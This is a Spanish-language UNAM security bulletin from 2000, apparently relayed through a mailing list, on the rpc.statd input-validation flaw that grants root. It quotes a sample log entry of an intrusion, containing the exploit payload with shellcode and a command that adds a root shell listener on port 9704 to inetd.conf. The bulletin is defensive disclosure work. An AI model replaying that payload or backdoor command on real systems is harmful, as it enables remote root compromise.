[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]-----BEGIN PGP SIGNED MESSAGE----- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 'Area de Seguridad en C'omputo DGSCA- UNAM Bolet'in de Seguridad 2000-009 Problemas en la Validaci'on del programa rpc.statd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Fecha de Liberaci'on : 18 de Agosto del 2000 Ultima Revisi'on : 26 de Agosto del 2000 Fuente: CERT/CC y diversos reportes de Equipos de Respuesta a Incidentes , , , , , , , , , , , , * Sistemas Afectados * , , , , , , , , , , , , Todos los sistemas que se encuentren ejecutando el programa rpc.statd , , , , , , , , , , , , , , , * Descripci'on del Problema * , , , , , , , , , , , , , , , En los 'ultimos d'ias se ha manejado en diversas listas de discusi'on y en reportes de equipos de respuesta a incidentes, reportes de una vulnerbilidad en la validaci'on de entrada del programa rpc.statd y que dicha vulnerabilidad est'a siendo usada para obtener acceso a los sistemas de c'omputo. Este programa llamado rpc.statd se instala por default en la mayor'a de las distribuciones del sistema operativo Linux. Recomendamos consultar el Apendice A de este documento el cual contiene informaci'on especif'ica para el sistema operativo que usted maneje y otras distribuciones. Para consultar mayores informes acerca de esta vulnerabilidad recomendamos consultar los siguientes URL's: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666 http://www.securityfocus.com/bid/1480 I. Descripci'on T'ecnica. El programa rpc.statd proporciona los datos proporcionados por el usuario a la funci'on syslog() como una cadena. Si no existe una entrada de validaci'on de dicha cadena, un usuario (intruso malicioso) puede insertar codigo para que 'este se ejecute con privilegios del proceso rpc.statd, usualmente estos privilegios le pertenecen al usuarios root. 2. Actividad de los Intrusos. El siguiente mensaje es un ejemplo de la actividad de los intrusos explotando la vulnerabilidad rpc.statd y que se registra t'ipicamente dentro de /var/log/messages al momento que se ejecuta y se explota la vulnerabilidad Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E^F^F^G^G08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000bffff7 0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 ><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 ><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v <83> <8D>^(<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ 1<83> <88>F'<88>F*<83> <88>F<89>F+, <89><8D>N<8D>V<80>1<89>@<80>/bin /sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd Si dentro de su sistema en el archivo /var/log/messages 'o /var/adm/messages, aparecen mensajes similares al anterior, le recomendamos examinar a la brevedad su sistema buscando alg'un indicio o patron a segurir de que su sistema ha sido comprometido. Le recomendamos si no sabe como llevarlo a cabo leer el tutorial de Detecci'on de Intrusos en las P'aginas del 'Area de Seguridad en C'omputo de la UNAM. http://www.asc.unam.mx http://www.seguridad.unam.mx , , , , , , * Impacto * , , , , , , Al explotar esta vulnerabilidad, los usuarios locales del sistema o remotos podr'an ejecutar diversos programas y c'odigo dentro del sistema con privilegios del proceso rpc.statd, usualmente con privilegios de Superusuario (root). , , , , , , , * Soluci'on * , , , , , , , Ante esta vulnerabilidad el 'Area de Seguridad en C'omputo de la UNAM, recomienda llevar a cabo las siguientes acciones. a) Actualizar la versi'on de rpc.statd Recomendamos consultar el ap'endice A de este bolet'in acerca de la disponibilidad de actualizaci'on de este programa para su sistema en especif'ico. Si Esta ejecutando una versi'on vulnerable del programa rpc.statd le recomendamos estar pendiente de las actualizaciones de dicho programa y le recomendamos ampliamente Actualizar la versi'on 'o en su defecto aplicar los parches correspondientes del sistema. Una vez instalados los parches del sistema reinicie el servicio rpc.statd. b) Desactivar el servicio rpc.statd Si la actualizaci'on del sistema no es posible llevarla a cabo, recomendamos desactivar el servicio rpc.statd. Recomendamos llevar a cabo estos pasos con precauci'on, ya que al desactivar este servicio puede interferir con el uso y funcionamiento del servicio NFS. c) Desactivar los puertos necesarios en su Firewall Como una buena pr'actica de seguridad se recomienda desactivar los puertos no necesarios dentro de su firewall. Esta opci'on no soluiona el problema anteriormente senalado, pero puede prevenir de los usuarios externos. En particular el bloquear el puerto 111 que corresponde al portmapper, puede ser una opci'on pero en algunos otros sistemas puede variar. - ----------------------------------------------- APENDICE A : Informacion adicional - ----------------------------------------------- A continuaci'on listamos los principales sistemas operativos en los cuales se ha analizado si presentan fallas en la vulnerabilidad descrita anteriormente. * Berkeley Software Design, Inc. (BSDI) Ninguna versi'on del sistema BSD/OS es vulnerable. * Caldera, Inc. No vulnerable * Compaq No vulnerable. * Debian Consulte : http://www.debian.org/security/2000/20000719a * FreeBSD FreeBSD no es vulnerable. * Hewlett-Packard Company No vulnerable. * NetBSD Las versiones 1.4.x y 1.5 no presentan vulnerabilidad alguna. * OpenBSD No vulnerable * RedHat Para una informaci'on mas detallada de este problema que SI afecta los RED HAT, consultar http://www.redhat.com/support/errata/RHSA-2000-043-03.html * Santa Cruz Operation No vulnerable * Silicon Graphics, Inc. No vulnerable * Sun Microsystems, Inc. No vulnerable , , , , , , , * INFORMACION * , , , , , , , Para Mayor Informaci'on o Detalles de este bolet'in contactar a: 'Area de Seguridad en C'omputo DGSCA- UNAM Tel : 56 22 81 69 Fax : 56 22 80 43 E-Mail : asc en asc unam mx http://www.asc.unam.mx ftp://ftp.asc.unam.mx - --- Juan Carlos Guel L'opez Area de Seguridad en C'omputo E-mail: asc en asc unam mx DGSCA, UNAM Tel.: 5622-81-69 Fax: 5622-80-43 Circuito Exterior, C. U. WWW: http://www.asc.unam.mx/ 04510 Mexico D. F. PGP: finger asc en ds5000 super unam mx -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.1i iQEVAwUBOamdhj6HeEeO/+C1AQEvawf/cbEletrW840MMhuyS4YQqY1QmlMYpTji 55Xdpg9/TAVzc+mrlPHXrjDxWT2Ouxlwqe9qsgIgxsrheVxkpPp6rCXBJFS4KEz+ Idj18mbOymRQGyfBQKAf2PDA34LBz1qeG1/VRZA26mZvjrKpprzqw73tcvYn3GcG n5MWqIgfUgjkBvv0TpWmiZouc5yFf4qoeP7w3jtiaW4MuS9vvMiEHQesTzjqTUtp Dk+kY+/ZGr+tX1HSf7XgJJdgbYFosOGGQCJjDrscVsZVYy8edfn7/gJObwKkMmeU kC5vviz3ilXn8vOlErbq8crDSq32WEb8qj7M6Fwerrm9qGUfBCuRew== =0Q4L -----END PGP SIGNATURE----- --------------------------------------------------------- para salir de la lista, enviar un mensaje con las palabras "unsubscribe ayuda" en el cuerpo a majordomo en linux org mx